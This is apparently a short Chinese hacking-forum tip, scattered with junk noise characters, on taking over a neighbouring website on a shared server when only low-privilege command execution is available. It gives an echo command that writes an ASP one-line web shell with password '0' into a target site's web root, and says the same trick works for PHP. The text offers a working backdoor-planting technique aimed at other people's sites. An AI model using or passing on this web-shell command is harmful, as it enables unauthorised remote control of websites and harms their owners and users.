在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。7 N. J% ?' M2 `8 [* d
+ h1 C. d3 r, j: G K. J" T
命令格式
. \: _- T7 {$ S5 ?9 Z, n4 Q7 R% W9 P F
Echo 语句 >目标站绝对目录1 E& M% n) `7 c: r! e
/ h+ {8 [( H: n+ n% I例如:
1 k# W/ I3 O! w5 H+ t+ k. X6 K: F, h; q9 ] B! ]8 ^1 ^- X
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
. ]- k( C' v; S3 Z( v
# j4 q: h- w' D8 z+ |& \/ O这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。1 p, M8 c+ h0 v: j& F& `! {5 U; x
|